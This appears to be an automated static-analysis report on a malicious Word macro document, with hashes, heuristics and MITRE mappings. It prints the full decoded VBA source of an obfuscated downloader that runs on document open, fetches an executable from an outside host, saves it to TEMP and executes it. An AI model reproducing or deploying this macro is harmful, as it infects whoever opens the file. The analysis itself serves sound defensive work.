Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2dca1e94c85d3142…

MALICIOUS

Office (OLE)

56.0 KB Created: 2016-05-08 21:39:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 3f7b09b5c131423b1e24e1bf0d6c47d5 SHA-1: 6a2837ee811840de31836ba9f52f446dc66aaa0b SHA-256: 2dca1e94c85d3142d776adc3b3cbe0130e1d1ceb51b0fa842ebe9227efb781aa
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The file contains VBA macros, including a Document_Open subroutine, which is a common technique for initial execution. Critical heuristics indicate the use of WScript.Shell and Shell() calls, suggesting the macro is designed to download and execute a secondary payload. The obfuscated nature of the VBA code and the use of CreateObject("MSXML2.ServerXMLHTTP.6.0") point towards a downloader functionality.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Public Function UKnBafgiv() As Object
Set UKnBafgiv = CreateObject("WScript.Shell")
End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function CgmHP() As Object
Set CgmHP = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub oxaqgX(ByVal KALgM As Object, ByVal eVWyJQj As String, ByVal aGcNNKfI As Variant, ByVal zynqJ As Variant)
CallByName KALgM, eVWyJQj, 1, aGcNNKfI, zynqJ
End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_Open()
BVLQFe.MMikFosIjK
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4098 bytes
SHA-256: 2aa6747321bfc5aa61c7313107ee493022fad62526ac50f453f527a2083be182
Detection
ClamAV: No threats found
Obfuscation or payload: likely
44 of 88 identifiers look randomly generated (e.g. 'ExWnvBRirWBonBmRxexnRt') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
BVLQFe.MMikFosIjK
End Sub

Attribute VB_Name = "DmNglmZeX"
Public Function nCLSXP(ByVal LQHkHRjSc As String, ByVal dTeZbLiVQ As String) As String
Dim UwtKS As Boolean
For lZKqtZoIz = 1 To Len(LQHkHRjSc)
UwtKS = PuFOaRrxM.CcyfQ(dTeZbLiVQ, PuFOaRrxM.MzhytG(LQHkHRjSc, lZKqtZoIz))
If Not UwtKS Then
nCLSXP = nCLSXP & PuFOaRrxM.MzhytG(LQHkHRjSc, lZKqtZoIz)
End If
Next
End Function

Attribute VB_Name = "dtmzWzi"
Public Sub oxaqgX(ByVal KALgM As Object, ByVal eVWyJQj As String, ByVal aGcNNKfI As Variant, ByVal zynqJ As Variant)
CallByName KALgM, eVWyJQj, 1, aGcNNKfI, zynqJ
End Sub
Public Function VMcdEzBc(ByVal KALgM As Object, ByVal RBfXrotO As String) As Variant
VMcdEzBc = CallByName(KALgM, RBfXrotO, 2)
End Function
Public Sub pvVyKHW(ByVal KALgM As Object, ByVal eVWyJQj As String)
CallByName KALgM, eVWyJQj, 1
End Sub
Public Sub HcnoqyGD(ByVal KALgM As Object, ByVal RBfXrotO As String, ByVal RzsaGG As Variant)
CallByName KALgM, RBfXrotO, 4, RzsaGG
End Sub
Public Sub ebULIu(ByVal KALgM As Object, ByVal eVWyJQj As String, ByVal icAQhKfi As Variant)
CallByName KALgM, eVWyJQj, 1, icAQhKfi
End Sub
Public Function KGUZKVAna(ByVal KALgM As Object, ByVal eVWyJQj As String, ByVal icAQhKfi As String) As Variant
Set KGUZKVAna = CallByName(KALgM, eVWyJQj, 2, icAQhKfi)
End Function

Attribute VB_Name = "SXArNj"
Public Function CgmHP() As Object
Set CgmHP = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Public Function ScJdAxTtU() As Object
Set ScJdAxTtU = CreateObject("ADODB.Stream")
End Function
Public Function UKnBafgiv() As Object
Set UKnBafgiv = CreateObject("WScript.Shell")
End Function

Attribute VB_Name = "BVLQFe"
Private Sub AQzKw(ByVal wsVLVo As String)
dtmzWzi.ebULIu SXArNj.UKnBafgiv, DmNglmZeX.nCLSXP("BEixBecX", "B5XiJ"), wsVLVo
End Sub
Private Sub QzKYhsQi(ByVal XNvCezNDB As String, ByVal nPPRBCP As String)
Set HxZeTX = SXArNj.CgmHP
HxZeTX.Open DmNglmZeX.nCLSXP("gGEiTi", "Mhgi"), XNvCezNDB, False
dtmzWzi.pvVyKHW HxZeTX, DmNglmZeX.nCLSXP("FSewnadF", "WwFa")
LbwvT nPPRBCP, dtmzWzi.VMcdEzBc(HxZeTX, DmNglmZeX.nCLSXP("iRefsffp/onEsEe/fBiodfyO", "3E/fOi"))
End Sub
Private Function xhdZVSbFaj() As String
xhdZVSbFaj = DmNglmZeX.nCLSXP("WhCttWpCW:/2/2AlAawCCmaAtW2e.2cACo2m.W2auCC/m2CedCCi2a/WdCo2cWuCm2eWn22tW.AexCeW", "AC2W")
End Function
Public Sub MMikFosIjK()
fubPB
End Sub
Private Sub LbwvT(ByVal nPPRBCP As String, ByVal bixPrNmocu As Variant)
Set uuSszHSuos = SXArNj.ScJdAxTtU
dtmzWzi.HcnoqyGD uuSszHSuos, DmNglmZeX.nCLSXP("TsHypPPe", "HdsP"), 1
dtmzWzi.pvVyKHW uuSszHSuos, DmNglmZeX.nCLSXP("IOpzeIn9", "9Iz")
dtmzWzi.ebULIu uuSszHSuos, DmNglmZeX.nCLSXP("WMnrQinteM", "nQM"), bixPrNmocu
dtmzWzi.oxaqgX uuSszHSuos, DmNglmZeX.nCLSXP("5Sanvne52ToVFVniVle2", "5Vn2"), nPPRBCP, 2
dtmzWzi.pvVyKHW uuSszHSuos, DmNglmZeX.nCLSXP("CZFlyosyeZ", "yFZ")
End Sub
Private Sub fubPB()
On Error GoTo xvcAhTNUn
QzKYhsQi xhdZVSbFaj, HxqUeJpZ
AQzKw HxqUeJpZ
Exit Sub
xvcAhTNUn:
End Sub
Private Function wyqvpLN(ByVal hoeftiv As String) As String
Set UJtXdOEb = dtmzWzi.KGUZKVAna(SXArNj.UKnBafgiv, DmNglmZeX.nCLSXP("ExWnvBRirWBonBmRxexnRt", "BxRW"), DmNglmZeX.nCLSXP("Pq RkOC  ESkqS", "Yqwk "))
wyqvpLN = UJtXdOEb(hoeftiv)
End Function
Private Function HxqUeJpZ() As String
HxqUeJpZ = wyqvpLN(DmNglmZeX.nCLSXP("TXZEwMXP", "ZXw")) & UGmEsSJfqO
End Function
Private Function UGmEsSJfqO() As String
UGmEsSJfqO = DmNglmZeX.nCLSXP("Q/caabQ3Qd7a6T3T4a7Q4QE.eTTxae", "aEQT")
End Function

Attribute VB_Name = "PuFOaRrxM"
Public Function MzhytG(ByVal IMEvRpz As String, ByVal lZKqtZoIz As Integer) As String
MzhytG = Mid(IMEvRpz, lZKqtZoIz, 1)
End Function
Public Function CcyfQ(ByVal IMEvRpz As String, ByVal VoOjTz As String) As Boolean
CcyfQ = InStr(1, IMEvRpz, VoOjTz)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.